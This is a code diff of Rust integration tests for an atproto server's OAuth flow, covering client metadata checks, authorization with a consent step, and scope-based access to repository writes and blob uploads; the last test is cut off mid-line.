··· 7 async fn test_frontend_client_metadata_returns_valid_json() { 8 let client = client(); 9 let res = client 10 - .get(format!( 11 - "{}/oauth/client-metadata.json", 12 - base_url().await 13 - )) 14 .send() 15 .await 16 .expect("Failed to send request"); 17 assert_eq!(res.status(), StatusCode::OK); 18 let body: Value = res.json().await.expect("Should return valid JSON"); 19 - assert!(body["client_id"].as_str().is_some(), "Should have client_id"); 20 - assert!(body["client_name"].as_str().is_some(), "Should have client_name"); 21 - assert!(body["redirect_uris"].as_array().is_some(), "Should have redirect_uris"); 22 - assert!(body["grant_types"].as_array().is_some(), "Should have grant_types"); 23 - assert!(body["response_types"].as_array().is_some(), "Should have response_types"); 24 assert!(body["scope"].as_str().is_some(), "Should have scope"); 25 - assert!(body["token_endpoint_auth_method"].as_str().is_some(), "Should have token_endpoint_auth_method"); 26 } 27 28 #[tokio::test] 29 async fn test_frontend_client_metadata_correct_values() { 30 let client = client(); 31 let res = client 32 - .get(format!( 33 - "{}/oauth/client-metadata.json", 34 - base_url().await 35 - )) 36 .send() 37 .await 38 .expect("Failed to send request"); 39 assert_eq!(res.status(), StatusCode::OK); 40 let body: Value = res.json().await.unwrap(); 41 let client_id = body["client_id"].as_str().unwrap(); 42 - assert!(client_id.ends_with("/oauth/client-metadata.json"), "client_id should end with /oauth/client-metadata.json"); 43 let grant_types = body["grant_types"].as_array().unwrap(); 44 let grant_strs: Vec<&str> = grant_types.iter().filter_map(|v| v.as_str()).collect(); 45 - assert!(grant_strs.contains(&"authorization_code"), "Should support authorization_code grant"); 46 - assert!(grant_strs.contains(&"refresh_token"), "Should support refresh_token grant"); 47 let response_types = body["response_types"].as_array().unwrap(); 48 let response_strs: Vec<&str> = response_types.iter().filter_map(|v| v.as_str()).collect(); 49 - assert!(response_strs.contains(&"code"), "Should support code response type"); 50 - assert_eq!(body["token_endpoint_auth_method"].as_str(), Some("none"), "Should be public client (none auth)"); 51 - assert_eq!(body["application_type"].as_str(), Some("web"), "Should be web application"); 52 - assert_eq!(body["dpop_bound_access_tokens"].as_bool(), Some(false), "Should not require DPoP"); 53 let scope = body["scope"].as_str().unwrap(); 54 assert!(scope.contains("atproto"), "Scope should include atproto"); 55 } ··· 58 async fn test_frontend_client_metadata_redirect_uri_matches_client_uri() { 59 let client = client(); 60 let res = client 61 - .get(format!( 62 - "{}/oauth/client-metadata.json", 63 - base_url().await 64 - )) 65 .send() 66 .await 67 .expect("Failed to send request"); ··· 69 let body: Value = res.json().await.unwrap(); 70 let client_uri = body["client_uri"].as_str().unwrap(); 71 let redirect_uris = body["redirect_uris"].as_array().unwrap(); 72 - assert!(!redirect_uris.is_empty(), "Should have at least one redirect URI"); 73 let redirect_uri = redirect_uris[0].as_str().unwrap(); 74 - assert!(redirect_uri.starts_with(client_uri), "Redirect URI should be on same origin as client_uri"); 75 }
··· 7 async fn test_frontend_client_metadata_returns_valid_json() { 8 let client = client(); 9 let res = client 10 + .get(format!("{}/oauth/client-metadata.json", base_url().await)) 11 .send() 12 .await 13 .expect("Failed to send request"); 14 assert_eq!(res.status(), StatusCode::OK); 15 let body: Value = res.json().await.expect("Should return valid JSON"); 16 + assert!( 17 + body["client_id"].as_str().is_some(), 18 + "Should have client_id" 19 + ); 20 + assert!( 21 + body["client_name"].as_str().is_some(), 22 + "Should have client_name" 23 + ); 24 + assert!( 25 + body["redirect_uris"].as_array().is_some(), 26 + "Should have redirect_uris" 27 + ); 28 + assert!( 29 + body["grant_types"].as_array().is_some(), 30 + "Should have grant_types" 31 + ); 32 + assert!( 33 + body["response_types"].as_array().is_some(), 34 + "Should have response_types" 35 + ); 36 assert!(body["scope"].as_str().is_some(), "Should have scope"); 37 + assert!( 38 + body["token_endpoint_auth_method"].as_str().is_some(), 39 + "Should have token_endpoint_auth_method" 40 + ); 41 } 42 43 #[tokio::test] 44 async fn test_frontend_client_metadata_correct_values() { 45 let client = client(); 46 let res = client 47 + .get(format!("{}/oauth/client-metadata.json", base_url().await)) 48 .send() 49 .await 50 .expect("Failed to send request"); 51 assert_eq!(res.status(), StatusCode::OK); 52 let body: Value = res.json().await.unwrap(); 53 let client_id = body["client_id"].as_str().unwrap(); 54 + assert!( 55 + client_id.ends_with("/oauth/client-metadata.json"), 56 + "client_id should end with /oauth/client-metadata.json" 57 + ); 58 let grant_types = body["grant_types"].as_array().unwrap(); 59 let grant_strs: Vec<&str> = grant_types.iter().filter_map(|v| v.as_str()).collect(); 60 + assert!( 61 + grant_strs.contains(&"authorization_code"), 62 + "Should support authorization_code grant" 63 + ); 64 + assert!( 65 + grant_strs.contains(&"refresh_token"), 66 + "Should support refresh_token grant" 67 + ); 68 let response_types = body["response_types"].as_array().unwrap(); 69 let response_strs: Vec<&str> = response_types.iter().filter_map(|v| v.as_str()).collect(); 70 + assert!( 71 + response_strs.contains(&"code"), 72 + "Should support code response type" 73 + ); 74 + assert_eq!( 75 + body["token_endpoint_auth_method"].as_str(), 76 + Some("none"), 77 + "Should be public client (none auth)" 78 + ); 79 + assert_eq!( 80 + body["application_type"].as_str(), 81 + Some("web"), 82 + "Should be web application" 83 + ); 84 + assert_eq!( 85 + body["dpop_bound_access_tokens"].as_bool(), 86 + Some(false), 87 + "Should not require DPoP" 88 + ); 89 let scope = body["scope"].as_str().unwrap(); 90 assert!(scope.contains("atproto"), "Scope should include atproto"); 91 } ··· 94 async fn test_frontend_client_metadata_redirect_uri_matches_client_uri() { 95 let client = client(); 96 let res = client 97 + .get(format!("{}/oauth/client-metadata.json", base_url().await)) 98 .send() 99 .await 100 .expect("Failed to send request"); ··· 102 let body: Value = res.json().await.unwrap(); 103 let client_uri = body["client_uri"].as_str().unwrap(); 104 let redirect_uris = body["redirect_uris"].as_array().unwrap(); 105 + assert!( 106 + !redirect_uris.is_empty(), 107 + "Should have at least one redirect URI" 108 + ); 109 let redirect_uri = redirect_uris[0].as_str().unwrap(); 110 + assert!( 111 + redirect_uri.starts_with(client_uri), 112 + "Redirect URI should be on same origin as client_uri" 113 + ); 114 }
+79 -49
tests/oauth_lifecycle.rs
··· 5 use chrono::Utc; 6 use common::{base_url, client}; 7 use helpers::verify_new_account; 8 - use reqwest::{StatusCode, redirect}; 9 use serde_json::{Value, json}; 10 use sha2::{Digest, Sha256}; 11 use wiremock::matchers::{method, path}; ··· 19 let hash = hasher.finalize(); 20 let code_challenge = URL_SAFE_NO_PAD.encode(&hash); 21 (code_verifier, code_challenge) 22 - } 23 - 24 - fn no_redirect_client() -> reqwest::Client { 25 - reqwest::Client::builder() 26 - .redirect(redirect::Policy::none()) 27 - .build() 28 - .unwrap() 29 } 30 31 async fn setup_mock_client_metadata(redirect_uri: &str) -> MockServer { ··· 102 ); 103 let par_body: Value = par_res.json().await.unwrap(); 104 let request_uri = par_body["request_uri"].as_str().unwrap(); 105 - let auth_client = no_redirect_client(); 106 - let auth_res = auth_client 107 .post(format!("{}/oauth/authorize", url)) 108 - .form(&[ 109 - ("request_uri", request_uri), 110 - ("username", &handle), 111 - ("password", &password), 112 - ("remember_device", "false"), 113 - ]) 114 .send() 115 .await 116 .expect("Authorize failed"); 117 - let location = auth_res 118 - .headers() 119 - .get("location") 120 - .unwrap() 121 - .to_str() 122 - .unwrap(); 123 let code = location 124 .split("code=") 125 .nth(1) ··· 596 .unwrap(); 597 let par_body1: Value = par_res1.json().await.unwrap(); 598 let request_uri1 = par_body1["request_uri"].as_str().unwrap(); 599 - let auth_client = no_redirect_client(); 600 - let auth_res1 = auth_client 601 .post(format!("{}/oauth/authorize", url)) 602 - .form(&[ 603 - ("request_uri", request_uri1), 604 - ("username", &handle), 605 - ("password", password), 606 - ("remember_device", "false"), 607 - ]) 608 .send() 609 .await 610 .unwrap(); 611 - let location1 = auth_res1 612 - .headers() 613 - .get("location") 614 - .unwrap() 615 - .to_str() 616 - .unwrap(); 617 let code1 = location1 618 .split("code=") 619 .nth(1) ··· 650 .unwrap(); 651 let par_body2: Value = par_res2.json().await.unwrap(); 652 let request_uri2 = par_body2["request_uri"].as_str().unwrap(); 653 - let auth_res2 = auth_client 654 .post(format!("{}/oauth/authorize", url)) 655 - .form(&[ 656 - ("request_uri", request_uri2), 657 - ("username", &handle), 658 - ("password", password), 659 - ("remember_device", "false"), 660 - ]) 661 .send() 662 .await 663 .unwrap(); 664 - let location2 = auth_res2 665 - .headers() 666 - .get("location") 667 - .unwrap() 668 - .to_str() 669 - .unwrap(); 670 let code2 = location2 671 .split("code=") 672 .nth(1)
··· 5 use chrono::Utc; 6 use common::{base_url, client}; 7 use helpers::verify_new_account; 8 + use reqwest::StatusCode; 9 use serde_json::{Value, json}; 10 use sha2::{Digest, Sha256}; 11 use wiremock::matchers::{method, path}; ··· 19 let hash = hasher.finalize(); 20 let code_challenge = URL_SAFE_NO_PAD.encode(&hash); 21 (code_verifier, code_challenge) 22 } 23 24 async fn setup_mock_client_metadata(redirect_uri: &str) -> MockServer { ··· 95 ); 96 let par_body: Value = par_res.json().await.unwrap(); 97 let request_uri = par_body["request_uri"].as_str().unwrap(); 98 + let auth_res = http_client 99 .post(format!("{}/oauth/authorize", url)) 100 + .header("Content-Type", "application/json") 101 + .header("Accept", "application/json") 102 + .json(&json!({ 103 + "request_uri": request_uri, 104 + "username": &handle, 105 + "password": &password, 106 + "remember_device": false 107 + })) 108 .send() 109 .await 110 .expect("Authorize failed"); 111 + assert_eq!( 112 + auth_res.status(), 113 + StatusCode::OK, 114 + "Authorize should return OK" 115 + ); 116 + let auth_body: Value = auth_res.json().await.unwrap(); 117 + let mut location = auth_body["redirect_uri"] 118 + .as_str() 119 + .expect("Expected redirect_uri") 120 + .to_string(); 121 + if location.contains("/oauth/consent") { 122 + let consent_res = http_client 123 + .post(format!("{}/oauth/authorize/consent", url)) 124 + .header("Content-Type", "application/json") 125 + .json(&json!({"request_uri": request_uri, "approved_scopes": ["atproto"], "remember": false})) 126 + .send().await.expect("Consent request failed"); 127 + assert_eq!( 128 + consent_res.status(), 129 + StatusCode::OK, 130 + "Consent should succeed" 131 + ); 132 + let consent_body: Value = consent_res.json().await.unwrap(); 133 + location = consent_body["redirect_uri"] 134 + .as_str() 135 + .expect("Expected redirect_uri from consent") 136 + .to_string(); 137 + } 138 let code = location 139 .split("code=") 140 .nth(1) ··· 611 .unwrap(); 612 let par_body1: Value = par_res1.json().await.unwrap(); 613 let request_uri1 = par_body1["request_uri"].as_str().unwrap(); 614 + let auth_res1 = http_client 615 .post(format!("{}/oauth/authorize", url)) 616 + .header("Content-Type", "application/json") 617 + .header("Accept", "application/json") 618 + .json(&json!({ 619 + "request_uri": request_uri1, 620 + "username": &handle, 621 + "password": password, 622 + "remember_device": false 623 + })) 624 .send() 625 .await 626 .unwrap(); 627 + assert_eq!(auth_res1.status(), StatusCode::OK); 628 + let auth_body1: Value = auth_res1.json().await.unwrap(); 629 + let mut location1 = auth_body1["redirect_uri"].as_str().unwrap().to_string(); 630 + if location1.contains("/oauth/consent") { 631 + let consent_res = http_client 632 + .post(format!("{}/oauth/authorize/consent", url)) 633 + .header("Content-Type", "application/json") 634 + .json(&json!({"request_uri": request_uri1, "approved_scopes": ["atproto"], "remember": false})) 635 + .send().await.unwrap(); 636 + let consent_body: Value = consent_res.json().await.unwrap(); 637 + location1 = consent_body["redirect_uri"].as_str().unwrap().to_string(); 638 + } 639 let code1 = location1 640 .split("code=") 641 .nth(1) ··· 672 .unwrap(); 673 let par_body2: Value = par_res2.json().await.unwrap(); 674 let request_uri2 = par_body2["request_uri"].as_str().unwrap(); 675 + let auth_res2 = http_client 676 .post(format!("{}/oauth/authorize", url)) 677 + .header("Content-Type", "application/json") 678 + .header("Accept", "application/json") 679 + .json(&json!({ 680 + "request_uri": request_uri2, 681 + "username": &handle, 682 + "password": password, 683 + "remember_device": false 684 + })) 685 .send() 686 .await 687 .unwrap(); 688 + assert_eq!(auth_res2.status(), StatusCode::OK); 689 + let auth_body2: Value = auth_res2.json().await.unwrap(); 690 + let mut location2 = auth_body2["redirect_uri"].as_str().unwrap().to_string(); 691 + if location2.contains("/oauth/consent") { 692 + let consent_res = http_client 693 + .post(format!("{}/oauth/authorize/consent", url)) 694 + .header("Content-Type", "application/json") 695 + .json(&json!({"request_uri": request_uri2, "approved_scopes": ["atproto"], "remember": false})) 696 + .send().await.unwrap(); 697 + let consent_body: Value = consent_res.json().await.unwrap(); 698 + location2 = consent_body["redirect_uri"].as_str().unwrap().to_string(); 699 + } 700 let code2 = location2 701 .split("code=") 702 .nth(1)
+753
tests/oauth_scopes.rs
···
··· 1 + mod common; 2 + mod helpers; 3 + 4 + use base64::{Engine as _, engine::general_purpose::URL_SAFE_NO_PAD}; 5 + use chrono::Utc; 6 + use common::{base_url, client}; 7 + use helpers::verify_new_account; 8 + use reqwest::StatusCode; 9 + use serde_json::{Value, json}; 10 + use sha2::{Digest, Sha256}; 11 + use wiremock::matchers::{method, path}; 12 + use wiremock::{Mock, MockServer, ResponseTemplate}; 13 + 14 + fn generate_pkce() -> (String, String) { 15 + let verifier_bytes: [u8; 32] = rand::random(); 16 + let code_verifier = URL_SAFE_NO_PAD.encode(verifier_bytes); 17 + let mut hasher = Sha256::new(); 18 + hasher.update(code_verifier.as_bytes()); 19 + let hash = hasher.finalize(); 20 + let code_challenge = URL_SAFE_NO_PAD.encode(&hash); 21 + (code_verifier, code_challenge) 22 + } 23 + 24 + async fn setup_mock_client_metadata(redirect_uri: &str) -> MockServer { 25 + let mock_server = MockServer::start().await; 26 + let client_id = mock_server.uri(); 27 + let metadata = json!({ 28 + "client_id": client_id, 29 + "client_name": "Test OAuth Scope Client", 30 + "redirect_uris": [redirect_uri], 31 + "grant_types": ["authorization_code", "refresh_token"], 32 + "response_types": ["code"], 33 + "token_endpoint_auth_method": "none", 34 + "dpop_bound_access_tokens": false 35 + }); 36 + Mock::given(method("GET")) 37 + .and(path("/")) 38 + .respond_with(ResponseTemplate::new(200).set_body_json(metadata)) 39 + .mount(&mock_server) 40 + .await; 41 + mock_server 42 + } 43 + 44 + struct OAuthSession { 45 + access_token: String, 46 + #[allow(dead_code)] 47 + refresh_token: String, 48 + did: String, 49 + #[allow(dead_code)] 50 + client_id: String, 51 + scope: String, 52 + } 53 + 54 + async fn create_user_and_oauth_session_with_scope( 55 + handle_prefix: &str, 56 + redirect_uri: &str, 57 + scope: &str, 58 + ) -> (OAuthSession, MockServer) { 59 + let url = base_url().await; 60 + let http_client = client(); 61 + let ts = Utc::now().timestamp_millis(); 62 + let handle = format!("{}-{}", handle_prefix, ts); 63 + let email = format!("{}-{}@example.com", handle_prefix, ts); 64 + let password = format!("{}-password", handle_prefix); 65 + 66 + let create_res = http_client 67 + .post(format!("{}/xrpc/com.atproto.server.createAccount", url)) 68 + .json(&json!({ 69 + "handle": handle, 70 + "email": email, 71 + "password": password 72 + })) 73 + .send() 74 + .await 75 + .expect("Account creation failed"); 76 + assert_eq!(create_res.status(), StatusCode::OK); 77 + let account: Value = create_res.json().await.unwrap(); 78 + let user_did = account["did"].as_str().unwrap().to_string(); 79 + 80 + let _ = verify_new_account(&http_client, &user_did).await; 81 + 82 + let mock_client = setup_mock_client_metadata(redirect_uri).await; 83 + let client_id = mock_client.uri(); 84 + let (code_verifier, code_challenge) = generate_pkce(); 85 + 86 + let par_res = http_client 87 + .post(format!("{}/oauth/par", url)) 88 + .form(&[ 89 + ("response_type", "code"), 90 + ("client_id", &client_id), 91 + ("redirect_uri", redirect_uri), 92 + ("code_challenge", &code_challenge), 93 + ("code_challenge_method", "S256"), 94 + ("scope", scope), 95 + ]) 96 + .send() 97 + .await 98 + .expect("PAR failed"); 99 + assert!( 100 + par_res.status() == StatusCode::OK || par_res.status() == StatusCode::CREATED, 101 + "PAR should succeed, got {}", 102 + par_res.status() 103 + ); 104 + let par_body: Value = par_res.json().await.unwrap(); 105 + let request_uri = par_body["request_uri"].as_str().unwrap(); 106 + 107 + let auth_res = http_client 108 + .post(format!("{}/oauth/authorize", url)) 109 + .header("Content-Type", "application/json") 110 + .header("Accept", "application/json") 111 + .json(&json!({ 112 + "request_uri": request_uri, 113 + "username": &handle, 114 + "password": &password, 115 + "remember_device": false 116 + })) 117 + .send() 118 + .await 119 + .expect("Authorize failed"); 120 + assert_eq!( 121 + auth_res.status(), 122 + StatusCode::OK, 123 + "Authorize should return OK" 124 + ); 125 + let auth_body: Value = auth_res.json().await.unwrap(); 126 + let mut location = auth_body["redirect_uri"] 127 + .as_str() 128 + .expect("Expected redirect_uri") 129 + .to_string(); 130 + if location.contains("/oauth/consent") { 131 + let consent_res = http_client 132 + .post(format!("{}/oauth/authorize/consent", url)) 133 + .header("Content-Type", "application/json") 134 + .json(&json!({"request_uri": request_uri, "approved_scopes": ["atproto"], "remember": false})) 135 + .send().await.expect("Consent request failed"); 136 + assert_eq!( 137 + consent_res.status(), 138 + StatusCode::OK, 139 + "Consent should succeed" 140 + ); 141 + let consent_body: Value = consent_res.json().await.unwrap(); 142 + location = consent_body["redirect_uri"] 143 + .as_str() 144 + .expect("Expected redirect_uri from consent") 145 + .to_string(); 146 + } 147 + let code = location 148 + .split("code=") 149 + .nth(1) 150 + .unwrap() 151 + .split('&') 152 + .next() 153 + .unwrap(); 154 + 155 + let token_res = http_client 156 + .post(format!("{}/oauth/token", url)) 157 + .form(&[ 158 + ("grant_type", "authorization_code"), 159 + ("code", code), 160 + ("redirect_uri", redirect_uri), 161 + ("code_verifier", &code_verifier), 162 + ("client_id", &client_id), 163 + ]) 164 + .send() 165 + .await 166 + .expect("Token request failed"); 167 + assert_eq!(token_res.status(), StatusCode::OK); 168 + let token_body: Value = token_res.json().await.unwrap(); 169 + 170 + let session = OAuthSession { 171 + access_token: token_body["access_token"].as_str().unwrap().to_string(), 172 + refresh_token: token_body["refresh_token"].as_str().unwrap().to_string(), 173 + did: user_did, 174 + client_id, 175 + scope: scope.to_string(), 176 + }; 177 + (session, mock_client) 178 + } 179 + 180 + #[tokio::test] 181 + async fn test_atproto_scope_allows_full_access() { 182 + let url = base_url().await; 183 + let http_client = client(); 184 + let (session, _mock) = create_user_and_oauth_session_with_scope( 185 + "scope-full", 186 + "https://example.com/callback", 187 + "atproto", 188 + ) 189 + .await; 190 + 191 + let collection = "app.bsky.feed.post"; 192 + let create_res = http_client 193 + .post(format!("{}/xrpc/com.atproto.repo.createRecord", url)) 194 + .bearer_auth(&session.access_token) 195 + .json(&json!({ 196 + "repo": session.did, 197 + "collection": collection, 198 + "record": { 199 + "$type": collection, 200 + "text": "Full access post", 201 + "createdAt": Utc::now().to_rfc3339() 202 + } 203 + })) 204 + .send() 205 + .await 206 + .unwrap(); 207 + 208 + assert_eq!( 209 + create_res.status(), 210 + StatusCode::OK, 211 + "atproto scope should allow creating records" 212 + ); 213 + let create_body: Value = create_res.json().await.unwrap(); 214 + let rkey = create_body["uri"] 215 + .as_str() 216 + .unwrap() 217 + .split('/') 218 + .last() 219 + .unwrap(); 220 + 221 + let put_res = http_client 222 + .post(format!("{}/xrpc/com.atproto.repo.putRecord", url)) 223 + .bearer_auth(&session.access_token) 224 + .json(&json!({ 225 + "repo": session.did, 226 + "collection": collection, 227 + "rkey": rkey, 228 + "record": { 229 + "$type": collection, 230 + "text": "Updated post", 231 + "createdAt": Utc::now().to_rfc3339() 232 + } 233 + })) 234 + .send() 235 + .await 236 + .unwrap(); 237 + assert_eq!( 238 + put_res.status(), 239 + StatusCode::OK, 240 + "atproto scope should allow updating records" 241 + ); 242 + 243 + let delete_res = http_client 244 + .post(format!("{}/xrpc/com.atproto.repo.deleteRecord", url)) 245 + .bearer_auth(&session.access_token) 246 + .json(&json!({ 247 + "repo": session.did, 248 + "collection": collection, 249 + "rkey": rkey 250 + })) 251 + .send() 252 + .await 253 + .unwrap(); 254 + assert_eq!( 255 + delete_res.status(), 256 + StatusCode::OK, 257 + "atproto scope should allow deleting records" 258 + ); 259 + } 260 + 261 + #[tokio::test] 262 + async fn test_atproto_scope_allows_blob_upload() { 263 + let url = base_url().await; 264 + let http_client = client(); 265 + let (session, _mock) = create_user_and_oauth_session_with_scope( 266 + "scope-blob", 267 + "https://example.com/callback", 268 + "atproto", 269 + ) 270 + .await; 271 + 272 + let blob_data = b"Test blob data for scope test"; 273 + let upload_res = http_client 274 + .post(format!("{}/xrpc/com.atproto.repo.uploadBlob", url)) 275 + .bearer_auth(&session.access_token) 276 + .header("Content-Type", "text/plain") 277 + .body(blob_data.to_vec()) 278 + .send() 279 + .await 280 + .unwrap(); 281 + 282 + assert_eq!( 283 + upload_res.status(), 284 + StatusCode::OK, 285 + "atproto scope should allow blob upload" 286 + ); 287 + let upload_body: Value = upload_res.json().await.unwrap(); 288 + assert!(upload_body["blob"]["ref"]["$link"].is_string()); 289 + } 290 + 291 + #[tokio::test] 292 + async fn test_atproto_scope_allows_batch_writes() { 293 + let url = base_url().await; 294 + let http_client = client(); 295 + let (session, _mock) = create_user_and_oauth_session_with_scope( 296 + "scope-batch", 297 + "https://example.com/callback", 298 + "atproto", 299 + ) 300 + .await; 301 + 302 + let collection = "app.bsky.feed.post"; 303 + let now = Utc::now().to_rfc3339(); 304 + let apply_res = http_client 305 + .post(format!("{}/xrpc/com.atproto.repo.applyWrites", url)) 306 + .bearer_auth(&session.access_token) 307 + .json(&json!({ 308 + "repo": session.did, 309 + "writes": [ 310 + { 311 + "$type": "com.atproto.repo.applyWrites#create", 312 + "collection": collection, 313 + "rkey": "batch-scope-1", 314 + "value": { 315 + "$type": collection, 316 + "text": "Batch post 1", 317 + "createdAt": now 318 + } 319 + }, 320 + { 321 + "$type": "com.atproto.repo.applyWrites#create", 322 + "collection": collection, 323 + "rkey": "batch-scope-2", 324 + "value": { 325 + "$type": collection, 326 + "text": "Batch post 2", 327 + "createdAt": now 328 + } 329 + } 330 + ] 331 + })) 332 + .send() 333 + .await 334 + .unwrap(); 335 + 336 + assert_eq!( 337 + apply_res.status(), 338 + StatusCode::OK, 339 + "atproto scope should allow batch writes" 340 + ); 341 + } 342 + 343 + #[tokio::test] 344 + async fn test_transition_generic_scope_allows_access() { 345 + let url = base_url().await; 346 + let http_client = client(); 347 + let (session, _mock) = create_user_and_oauth_session_with_scope( 348 + "scope-transition", 349 + "https://example.com/callback", 350 + "atproto transition:generic", 351 + ) 352 + .await; 353 + 354 + let collection = "app.bsky.feed.post"; 355 + let create_res = http_client 356 + .post(format!("{}/xrpc/com.atproto.repo.createRecord", url)) 357 + .bearer_auth(&session.access_token) 358 + .json(&json!({ 359 + "repo": session.did, 360 + "collection": collection, 361 + "record": { 362 + "$type": collection, 363 + "text": "Post with transition scope", 364 + "createdAt": Utc::now().to_rfc3339() 365 + } 366 + })) 367 + .send() 368 + .await 369 + .unwrap(); 370 + 371 + assert_eq!( 372 + create_res.status(), 373 + StatusCode::OK, 374 + "transition:generic scope combined with atproto should work" 375 + ); 376 + } 377 + 378 + #[tokio::test] 379 + async fn test_consent_endpoint_returns_scope_info() { 380 + let url = base_url().await; 381 + let http_client = client(); 382 + 383 + let ts = Utc::now().timestamp_millis(); 384 + let handle = format!("consent-test-{}", ts); 385 + let email = format!("consent-{}@example.com", ts); 386 + let password = "consent-password"; 387 + let redirect_uri = "https://consent-test.example.com/callback"; 388 + 389 + let create_res = http_client 390 + .post(format!("{}/xrpc/com.atproto.server.createAccount", url)) 391 + .json(&json!({ 392 + "handle": handle, 393 + "email": email, 394 + "password": password 395 + })) 396 + .send() 397 + .await 398 + .unwrap(); 399 + assert_eq!(create_res.status(), StatusCode::OK); 400 + let account: Value = create_res.json().await.unwrap(); 401 + let user_did = account["did"].as_str().unwrap(); 402 + let _ = verify_new_account(&http_client, user_did).await; 403 + 404 + let mock_client = setup_mock_client_metadata(redirect_uri).await; 405 + let client_id = mock_client.uri(); 406 + let (_, code_challenge) = generate_pkce(); 407 + 408 + let par_res = http_client 409 + .post(format!("{}/oauth/par", url)) 410 + .form(&[ 411 + ("response_type", "code"), 412 + ("client_id", &client_id), 413 + ("redirect_uri", redirect_uri), 414 + ("code_challenge", &code_challenge), 415 + ("code_challenge_method", "S256"), 416 + ("scope", "atproto transition:generic"), 417 + ]) 418 + .send() 419 + .await 420 + .unwrap(); 421 + let par_body: Value = par_res.json().await.unwrap(); 422 + let request_uri = par_body["request_uri"].as_str().unwrap(); 423 + 424 + let auth_res = http_client 425 + .post(format!("{}/oauth/authorize", url)) 426 + .header("Accept", "application/json") 427 + .json(&json!({ 428 + "request_uri": request_uri, 429 + "username": &handle, 430 + "password": password, 431 + "remember_device": false 432 + })) 433 + .send() 434 + .await 435 + .unwrap(); 436 + assert_eq!(auth_res.status(), StatusCode::OK, "Auth should succeed"); 437 + 438 + let consent_res = http_client 439 + .get(format!("{}/oauth/authorize/consent", url)) 440 + .query(&[("request_uri", request_uri)]) 441 + .send() 442 + .await 443 + .unwrap(); 444 + 445 + assert_eq!(consent_res.status(), StatusCode::OK); 446 + let consent_body: Value = consent_res.json().await.unwrap(); 447 + 448 + assert_eq!(consent_body["client_id"], client_id); 449 + assert_eq!(consent_body["did"], user_did); 450 + assert!(consent_body["scopes"].is_array()); 451 + 452 + let scopes = consent_body["scopes"].as_array().unwrap(); 453 + assert!(!scopes.is_empty(), "Should have scopes in response"); 454 + 455 + let atproto_scope = scopes.iter().find(|s| s["scope"] == "atproto"); 456 + assert!(atproto_scope.is_some(), "Should include atproto scope"); 457 + let atproto = atproto_scope.unwrap(); 458 + assert_eq!(atproto["required"], true, "atproto should be required"); 459 + assert!(atproto["description"].is_string()); 460 + assert!(atproto["display_name"].is_string()); 461 + 462 + let transition_scope = scopes.iter().find(|s| s["scope"] == "transition:generic"); 463 + assert!( 464 + transition_scope.is_some(), 465 + "Should include transition:generic scope" 466 + ); 467 + let transition = transition_scope.unwrap(); 468 + assert_eq!( 469 + transition["required"], false, 470 + "transition:generic should be optional" 471 + ); 472 + } 473 + 474 + #[tokio::test] 475 + async fn test_consent_post_generates_code() { 476 + let url = base_url().await; 477 + let http_client = client(); 478 + 479 + let ts = Utc::now().timestamp_millis(); 480 + let handle = format!("consent-post-{}", ts); 481 + let email = format!("consent-post-{}@example.com", ts); 482 + let password = "consent-post-password"; 483 + let redirect_uri = "https://consent-post.example.com/callback"; 484 + 485 + let create_res = http_client 486 + .post(format!("{}/xrpc/com.atproto.server.createAccount", url)) 487 + .json(&json!({ 488 + "handle": handle, 489 + "email": email, 490 + "password": password 491 + })) 492 + .send() 493 + .await 494 + .unwrap(); 495 + assert_eq!(create_res.status(), StatusCode::OK); 496 + let account: Value = create_res.json().await.unwrap(); 497 + let user_did = account["did"].as_str().unwrap(); 498 + let _ = verify_new_account(&http_client, user_did).await; 499 + 500 + let mock_client = setup_mock_client_metadata(redirect_uri).await; 501 + let client_id = mock_client.uri(); 502 + let (code_verifier, code_challenge) = generate_pkce(); 503 + 504 + let par_res = http_client 505 + .post(format!("{}/oauth/par", url)) 506 + .form(&[ 507 + ("response_type", "code"), 508 + ("client_id", &client_id), 509 + ("redirect_uri", redirect_uri), 510 + ("code_challenge", &code_challenge), 511 + ("code_challenge_method", "S256"), 512 + ("scope", "atproto"), 513 + ]) 514 + .send() 515 + .await 516 + .unwrap(); 517 + let par_body: Value = par_res.json().await.unwrap(); 518 + let request_uri = par_body["request_uri"].as_str().unwrap(); 519 + 520 + let auth_res = http_client 521 + .post(format!("{}/oauth/authorize", url)) 522 + .header("Accept", "application/json") 523 + .json(&json!({ 524 + "request_uri": request_uri, 525 + "username": &handle, 526 + "password": password, 527 + "remember_device": false 528 + })) 529 + .send() 530 + .await 531 + .unwrap(); 532 + assert_eq!(auth_res.status(), StatusCode::OK, "Auth should succeed"); 533 + 534 + let consent_post_res = http_client 535 + .post(format!("{}/oauth/authorize/consent", url)) 536 + .json(&json!({ 537 + "request_uri": request_uri, 538 + "approved_scopes": ["atproto"], 539 + "remember": false 540 + })) 541 + .send() 542 + .await 543 + .unwrap(); 544 + 545 + assert_eq!(consent_post_res.status(), StatusCode::OK); 546 + let consent_body: Value = consent_post_res.json().await.unwrap(); 547 + assert!( 548 + consent_body["redirect_uri"].is_string(), 549 + "Should return redirect URI" 550 + ); 551 + 552 + let redirect_uri_response = consent_body["redirect_uri"].as_str().unwrap(); 553 + assert!( 554 + redirect_uri_response.contains("code="), 555 + "Redirect URI should contain authorization code" 556 + ); 557 + 558 + let code = redirect_uri_response 559 + .split("code=") 560 + .nth(1) 561 + .unwrap() 562 + .split('&') 563 + .next() 564 + .unwrap(); 565 + 566 + let token_res = http_client 567 + .post(format!("{}/oauth/token", url)) 568 + .form(&[ 569 + ("grant_type", "authorization_code"), 570 + ("code", code), 571 + ("redirect_uri", redirect_uri), 572 + ("code_verifier", &code_verifier), 573 + ("client_id", &client_id), 574 + ]) 575 + .send() 576 + .await 577 + .unwrap(); 578 + 579 + assert_eq!( 580 + token_res.status(), 581 + StatusCode::OK, 582 + "Token exchange should succeed" 583 + ); 584 + let token_body: Value = token_res.json().await.unwrap(); 585 + assert!(token_body["access_token"].is_string()); 586 + } 587 + 588 + #[tokio::test] 589 + async fn test_consent_post_requires_atproto_scope() { 590 + let url = base_url().await; 591 + let http_client = client(); 592 + 593 + let ts = Utc::now().timestamp_millis(); 594 + let handle = format!("consent-req-{}", ts); 595 + let email = format!("consent-req-{}@example.com", ts); 596 + let password = "consent-req-password"; 597 + let redirect_uri = "https://consent-req.example.com/callback"; 598 + 599 + let create_res = http_client 600 + .post(format!("{}/xrpc/com.atproto.server.createAccount", url)) 601 + .json(&json!({ 602 + "handle": handle, 603 + "email": email, 604 + "password": password 605 + })) 606 + .send() 607 + .await 608 + .unwrap(); 609 + assert_eq!(create_res.status(), StatusCode::OK); 610 + let account: Value = create_res.json().await.unwrap(); 611 + let user_did = account["did"].as_str().unwrap(); 612 + let _ 